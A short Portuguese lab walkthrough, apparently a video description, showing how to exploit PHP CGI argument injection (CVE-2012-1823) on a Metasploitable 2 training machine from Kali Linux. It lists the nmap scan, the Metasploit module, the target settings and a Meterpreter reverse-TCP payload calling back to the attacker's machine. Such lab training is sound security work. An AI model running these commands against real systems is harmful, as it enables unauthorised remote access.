
Neste vídeo, a exploração de injeção de argumentos PHP CGI (CVE-2012-1823) no servidor Metasploitable 2 é realizada usando Kali Linux e Metasploit.
Identifique o IP do Metasploitable a partir do Kali:
ip a
Por exemplo:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
Vamos verificar a porta e o serviço:
nmap -p 80 192.168.56.102
Também é possível verificar no navegador:
msfconsole
search php cgi
O módulo correto:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
Vamos selecionar o payload:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
Vamos verificar:
show options
run
ou
exploit
Em caso de sucesso:
Meterpreter session 1 opened
sysinfo
whoami